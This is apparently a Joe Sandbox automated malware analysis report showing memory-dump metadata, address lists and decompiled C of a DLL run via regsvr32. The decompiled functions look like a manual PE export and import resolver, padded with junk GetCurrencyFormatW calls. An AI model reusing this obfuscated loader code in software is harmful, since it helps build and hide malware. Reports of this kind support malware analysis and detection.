                                                                                                            0x100218fa
                                                                                                            0x1002190f
                                                                                                            0x10021917
                                                                                                            0x10021919
                                                                                                            0x10021926
                                                                                                            0x10021926
                                                                                                            0x00000000
                                                                                                            0x10021919
                                                                                                            0x10021903
                                                                                                            0x10021909
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002190b
                                                                                                            0x1002190b
                                                                                                            0x00000000
                                                                                                            0x1002190b
                                                                                                            0x100218e8
                                                                                                            0x100218ee
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100218ee
                                                                                                            0x100218cd
                                                                                                            0x100218d3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100218d3
                                                                                                            0x10021833
                                                                                                            0x10021835
                                                                                                            0x1002184c
                                                                                                            0x10021854
                                                                                                            0x10021856
                                                                                                            0x1002186d
                                                                                                            0x10021875
                                                                                                            0x10021877
                                                                                                            0x1002188e
                                                                                                            0x10021896
                                                                                                            0x10021898
                                                                                                            0x100218a5
                                                                                                            0x100218a5
                                                                                                            0x00000000
                                                                                                            0x10021898
                                                                                                            0x10021884
                                                                                                            0x10021888
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021888
                                                                                                            0x10021863
                                                                                                            0x10021867
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021867
                                                                                                            0x10021842
                                                                                                            0x10021846
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021846
                                                                                                            0x100217a4
                                                                                                            0x100217a6
                                                                                                            0x100217bd
                                                                                                            0x100217c5
                                                                                                            0x100217c7
                                                                                                            0x100217de
                                                                                                            0x100217e6
                                                                                                            0x100217e8
                                                                                                            0x100217ff
                                                                                                            0x10021807
                                                                                                            0x10021809
                                                                                                            0x10021816
                                                                                                            0x10021816
                                                                                                            0x00000000
                                                                                                            0x10021809
                                                                                                            0x100217f5
                                                                                                            0x100217f9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100217f9
                                                                                                            0x100217d4
                                                                                                            0x100217d8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100217d8
                                                                                                            0x100217b3
                                                                                                            0x100217b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100217b7
                                                                                                            0x10021714
                                                                                                            0x10021716
                                                                                                            0x1002172d
                                                                                                            0x10021735
                                                                                                            0x10021737
                                                                                                            0x1002174e
                                                                                                            0x10021756
                                                                                                            0x10021758
                                                                                                            0x1002176f
                                                                                                            0x10021777
                                                                                                            0x10021779
                                                                                                            0x10021786
                                                                                                            0x10021786
                                                                                                            0x00000000
                                                                                                            0x10021779
                                                                                                            0x10021765
                                                                                                            0x10021769
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021769
                                                                                                            0x10021744
                                                                                                            0x10021748
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021748
                                                                                                            0x10021723
                                                                                                            0x10021727
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021727
                                                                                                            0x10021685
                                                                                                            0x10021687
                                                                                                            0x1002169e
                                                                                                            0x100216a6
                                                                                                            0x100216a8
                                                                                                            0x100216bf
                                                                                                            0x100216c7
                                                                                                            0x100216c9
                                                                                                            0x100216e0
                                                                                                            0x100216e8
                                                                                                            0x100216ea
                                                                                                            0x100216f7
                                                                                                            0x100216f7
                                                                                                            0x00000000
                                                                                                            0x100216ea
                                                                                                            0x100216d6
                                                                                                            0x100216da
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100216da
                                                                                                            0x100216b5
                                                                                                            0x100216b9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100216b9
                                                                                                            0x10021694
                                                                                                            0x10021698
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021698
                                                                                                            0x100215f6
                                                                                                            0x100215f8
                                                                                                            0x1002160f
                                                                                                            0x10021617
                                                                                                            0x10021619
                                                                                                            0x10021630
                                                                                                            0x10021638
                                                                                                            0x1002163a
                                                                                                            0x10021651
                                                                                                            0x10021659
                                                                                                            0x1002165b
                                                                                                            0x10021668
                                                                                                            0x10021668
                                                                                                            0x00000000
                                                                                                            0x1002165b
                                                                                                            0x10021647
                                                                                                            0x1002164b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002164b
                                                                                                            0x10021626
                                                                                                            0x1002162a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002162a
                                                                                                            0x10021605
                                                                                                            0x10021609
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002156c
                                                                                                            0x1002156c
                                                                                                            0x1002156f
                                                                                                            0x10021573
                                                                                                            0x10021575
                                                                                                            0x10021588
                                                                                                            0x10021588
                                                                                                            0x1002158c
                                                                                                            0x10021590
                                                                                                            0x10021592
                                                                                                            0x100215a5
                                                                                                            0x100215a5
                                                                                                            0x100215a9
                                                                                                            0x100215ad
                                                                                                            0x100215af
                                                                                                            0x100215c2
                                                                                                            0x100215c2
                                                                                                            0x100215c6
                                                                                                            0x100215ca
                                                                                                            0x100215cc
                                                                                                            0x100215d2
                                                                                                            0x100215d5
                                                                                                            0x100215d9
                                                                                                            0x100215d9
                                                                                                            0x00000000
                                                                                                            0x100215cc
                                                                                                            0x100215b5
                                                                                                            0x100215b8
                                                                                                            0x100215bc
                                                                                                            0x100215c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100215c0
                                                                                                            0x10021598
                                                                                                            0x1002159b
                                                                                                            0x1002159f
                                                                                                            0x100215a3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100215a3
                                                                                                            0x1002157b
                                                                                                            0x1002157e
                                                                                                            0x10021582
                                                                                                            0x10021586
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021586
                                                                                                            0x1002155d
                                                                                                            0x1002155d
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                            • Instruction ID: 2da0e54dddefb41058fc70ab6449d090570112ad5eb19a5968f9a25804f4f724
                                                                                                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                            • Instruction Fuzzy Hash: E0C1847BD0A9F3468775C12D606816EEEA3AFE158139FC3E1CCE42F289D6279D0195D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003122 Relevance: 59.9, APIs: 32, Strings: 2, Instructions: 377COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10003122(signed int _a4, signed short _a8) {
				signed int _v4;
				void* _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t113;
				signed int _t124;
				intOrPtr _t125;
				int _t129;
				signed int _t130;
				signed int _t133;
				void* _t140;
				signed int _t141;
				void* _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr* _t186;
				signed int _t196;
				signed int _t197;
				short* _t198;
				void* _t238;

				_t238 =  &_v24;
				_t198 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v4;
				_t113 =  *_a4 + 0x78 + (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v4) * 8;
				_v8 = _t113;
				if( *((intOrPtr*)(_t113 + 4)) == 0) {
					L16:
					return 0;
				}
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) * 0x28;
				_v24 = (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) + _v4) *  *0x100440d0 +  *_v8 + _v20;
				if( *(_v24 + 0x18) == GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4) {
					goto L16;
				}
				_t124 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t125 = _v24;
				if( *((intOrPtr*)(_t125 + 0x14)) == _t124 *  *0x100440e0) {
					goto L16;
				}
				_push(0x22b9);
				_push(L"xadqsavcbdfewescGADW");
				_push(0);
				_push(_t198);
				_push(0x11d4);
				_push(0);
				if(_a8 >> 0x10 != 0) {
					if(GetCurrencyFormatW() *  *0x100440d4 + (0 |  *(_v24 + 0x18) == 0x00000000) != 0) {
						goto L16;
					}
					_t129 = 0;
					if( *(_a4 + 0x30) != 0) {
						L12:
						_t130 = GetCurrencyFormatW(_t129, 0x11d4, _t198, _t129, L"xadqsavcbdfewescGADW", 0x22b9);
						_t133 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t140 = bsearch(_t238 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 4,  *(_a4 + 0x30), _t133 *  *0x100440d4 +  *(_v24 + 0x18), _t130 *  *0x100440d4 + 8, E1000310E);
						if(_t140 == 0) {
							goto L16;
						}
						_t141 =  *(_t140 + 4) & 0x0000ffff;
						L14:
						_a4 = _t141;
						if(_a4 > GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x14))) {
							goto L16;
						}
						return  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x1c)) + _v20 + _a4 * 4)) + _v20;
					}
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 2;
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x20)) + _v4 + _v20;
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x24)) + _v4 + _v20;
					_v4 = malloc(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *(_v24 + 0x18) * 8);
					_t173 = _v4 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 8;
					_v8 = _t173;
					 *(_a4 + 0x30) = _t173;
					if(_t173 == 0) {
						goto L16;
					}
					_v4 = _v4 & 0x00000000;
					if(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18) == 0) {
						L11:
						_t177 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						qsort( *(_a4 + 0x30), GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *(_v24 + 0x18), _t177 *  *0x100440d8 + 8, E100030AA);
						_t238 = _t238 + 0x10;
						_t129 = 0;
						goto L12;
					} else {
						goto L10;
					}
					do {
						L10:
						_t184 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t186 = _v8;
						 *_t186 = _t184 *  *0x100440dc + _v20 +  *_v16;
						 *((short*)(_t186 + 4)) =  *_v12;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v4 = _v4 + 1;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v16 = _v16 + 4;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v12 = _v12 + 2;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v8 = _v8 + 8;
					} while (_v4 < GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18));
					goto L11;
				}
				_a4 =  *((intOrPtr*)(_t125 + 0x10));
				_v4 = _a8 & 0x0000ffff;
				_t196 = GetCurrencyFormatW(??, ??, ??, ??, ??, ??);
				_t197 = _v4;
				if(_t197 < _t196 *  *0x100440d0 + _a4) {
					goto L16;
				}
				_t141 = _t197 - _a4;
				goto L14;
			}

























                                                                                                            0x10003122
                                                                                                            0x10003143
                                                                                                            0x10003151
                                                                                                            0x1000316a
                                                                                                            0x10003187
                                                                                                            0x1000319e
                                                                                                            0x100031a7
                                                                                                            0x100031ab
                                                                                                            0x1000355d
                                                                                                            0x00000000
                                                                                                            0x1000355d
                                                                                                            0x100031cc
                                                                                                            0x100031f3
                                                                                                            0x10003207
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003219
                                                                                                            0x10003224
                                                                                                            0x1000322b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003235
                                                                                                            0x10003236
                                                                                                            0x1000323b
                                                                                                            0x1000323d
                                                                                                            0x10003244
                                                                                                            0x10003245
                                                                                                            0x10003247
                                                                                                            0x10003294
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000329e
                                                                                                            0x100032a3
                                                                                                            0x1000349f
                                                                                                            0x100034ae
                                                                                                            0x100034c7
                                                                                                            0x100034f9
                                                                                                            0x10003504
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003506
                                                                                                            0x1000350a
                                                                                                            0x10003516
                                                                                                            0x1000352e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003557
                                                                                                            0x100032cb
                                                                                                            0x100032f3
                                                                                                            0x1000330e
                                                                                                            0x10003336
                                                                                                            0x10003361
                                                                                                            0x10003372
                                                                                                            0x1000337b
                                                                                                            0x1000337f
                                                                                                            0x10003382
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003388
                                                                                                            0x100033a9
                                                                                                            0x10003452
                                                                                                            0x10003463
                                                                                                            0x10003494
                                                                                                            0x1000349a
                                                                                                            0x1000349d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100033af
                                                                                                            0x100033af
                                                                                                            0x100033bb
                                                                                                            0x100033d0
                                                                                                            0x100033dc
                                                                                                            0x100033e9
                                                                                                            0x100033ed
                                                                                                            0x100033ef
                                                                                                            0x100033ff
                                                                                                            0x10003401
                                                                                                            0x10003412
                                                                                                            0x10003414
                                                                                                            0x10003425
                                                                                                            0x10003427
                                                                                                            0x10003448
                                                                                                            0x00000000
                                                                                                            0x100033af
                                                                                                            0x1000324c
                                                                                                            0x10003255
                                                                                                            0x10003259
                                                                                                            0x10003268
                                                                                                            0x1000326e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003274
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003155
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000316E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000318B
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100031BB
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100031D0
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100031F7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003219
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003259
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000327D
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100032B3
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100032CF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100032F7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003312
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000333A
                                                                                                            • malloc.MSVCRT ref: 1000334E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003365
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003399
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000351A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000353C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$malloc
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3897936752-3161301136
                                                                                                            • Opcode ID: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
                                                                                                            • Instruction ID: 34db2b080b93b1a5fa06b343cb693385c3cc97db3aa9a73273c3b7a7a01e4154
                                                                                                            • Opcode Fuzzy Hash: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
                                                                                                            • Instruction Fuzzy Hash: 95C14670604214BFE208DB51CD96F5BBBECEB8A789F01480EF7459B2A2C731E9148F65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10002BDE Relevance: 52.9, APIs: 28, Strings: 2, Instructions: 381COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E10002BDE(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int* _v20;
				void* _v24;
				signed int _t121;
				signed int _t144;
				void* _t156;
				intOrPtr _t157;
				void* _t178;
				signed int _t184;
				intOrPtr _t189;
				intOrPtr _t192;
				short* _t218;
				intOrPtr _t246;
				intOrPtr* _t247;
				int _t256;
				void** _t257;

				_t257 =  &_v24;
				_t256 = 0x22b9;
				_t218 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v4 = 1;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8;
				_t121 =  *_a4 + 0x80 + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8) * 8;
				_v8 = _t121;
				if( *((intOrPtr*)(_t121 + 4)) != 0) {
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 0x14;
					_v24 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 +  *_v8 + _v12 + _v16;
					L20:
					while(IsBadHugeReadPtr(_v24, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc + 0x14) == 0) {
						if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0xc)) == 0) {
							L26:
							return _v4;
						}
						_t144 =  *((intOrPtr*)(_a4 + 0x24))(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0xc)) + _v16,  *((intOrPtr*)(_a4 + 0x34)));
						_v8 = _t144;
						if(_t144 == 0) {
							_v4 = 0;
							goto L26;
						}
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440cc +  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_v12 = realloc( *(_a4 + 8), (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + 4) * _v12);
						_t156 = _v12 + GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 * 4;
						if(_t156 == 0) {
							_t157 = _a4;
							 *((intOrPtr*)(_t157 + 0x2c))(_v8,  *((intOrPtr*)(_t157 + 0x34)));
							_v4 = _v4 & 0x00000000;
							L25:
							goto L26;
						}
						_t256 = 0x22b9;
						 *(_a4 + 8) = _t156;
						 *((intOrPtr*)( *(_a4 + 8) + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 0xc))) * 4)) = _v8;
						 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_push(0x22b9);
						_push(L"xadqsavcbdfewescGADW");
						_push(0);
						_push(_t218);
						_push(0x11d4);
						_push(0);
						if( *_v24 == 0) {
							_v12 = GetCurrencyFormatW() *  *0x100440e0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x10)) + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						} else {
							_v12 = GetCurrencyFormatW() *  *0x100440d0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *_v24 + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						}
						_v12 = _t178 + _v16;
						while( *_v20 != 0) {
							if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 + ( *_v20 >> 0x1f) == 0) {
								_t184 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_t246 = _a4;
								_t189 =  *((intOrPtr*)(_t246 + 0x28))(_v8, _t184 *  *0x100440e0 + _v16 +  *_v20 + 2,  *((intOrPtr*)(_t246 + 0x34)));
							} else {
								_t189 =  *((intOrPtr*)(_a4 + 0x28))(_v8, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + ( *_v20 & 0x0000ffff),  *((intOrPtr*)(_a4 + 0x34)));
							}
							_t247 = _v12;
							 *_t247 = _t189;
							_t257 =  &(_t257[3]);
							if( *_t247 == 0) {
								_v4 = 0;
								L18:
								if(_v4 == 0) {
									_t192 = _a4;
									 *((intOrPtr*)(_t192 + 0x2c))(_v8,  *((intOrPtr*)(_t192 + 0x34)));
									goto L25;
								}
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v24 = _v24 + 0x14;
								goto L20;
							} else {
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v20 =  &(_v20[1]);
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v12 = _v12 + 4;
								continue;
							}
						}
						goto L18;
					}
					goto L26;
				}
				return 1;
			}






















                                                                                                            0x10002bde
                                                                                                            0x10002bf2
                                                                                                            0x10002bff
                                                                                                            0x10002c0d
                                                                                                            0x10002c11
                                                                                                            0x10002c2e
                                                                                                            0x10002c4b
                                                                                                            0x10002c62
                                                                                                            0x10002c6e
                                                                                                            0x10002c72
                                                                                                            0x10002c9e
                                                                                                            0x10002cb9
                                                                                                            0x00000000
                                                                                                            0x10002fc9
                                                                                                            0x10002cde
                                                                                                            0x10003021
                                                                                                            0x00000000
                                                                                                            0x10003021
                                                                                                            0x10002d10
                                                                                                            0x10002d19
                                                                                                            0x10002d1d
                                                                                                            0x10002ff6
                                                                                                            0x00000000
                                                                                                            0x10002ff6
                                                                                                            0x10002d4d
                                                                                                            0x10002d7e
                                                                                                            0x10002d8f
                                                                                                            0x10002d94
                                                                                                            0x10002ffc
                                                                                                            0x10003007
                                                                                                            0x1000300a
                                                                                                            0x1000301f
                                                                                                            0x00000000
                                                                                                            0x10003020
                                                                                                            0x10002d9e
                                                                                                            0x10002daf
                                                                                                            0x10002dcb
                                                                                                            0x10002dd2
                                                                                                            0x10002dd9
                                                                                                            0x10002dda
                                                                                                            0x10002de3
                                                                                                            0x10002de4
                                                                                                            0x10002de5
                                                                                                            0x10002de6
                                                                                                            0x10002de7
                                                                                                            0x10002e76
                                                                                                            0x10002e9e
                                                                                                            0x10002eba
                                                                                                            0x10002ece
                                                                                                            0x10002de9
                                                                                                            0x10002e01
                                                                                                            0x10002e28
                                                                                                            0x10002e44
                                                                                                            0x10002e58
                                                                                                            0x10002e58
                                                                                                            0x10002ed6
                                                                                                            0x10002f9d
                                                                                                            0x10002eff
                                                                                                            0x10002f45
                                                                                                            0x10002f58
                                                                                                            0x10002f67
                                                                                                            0x10002f01
                                                                                                            0x10002f34
                                                                                                            0x10002f34
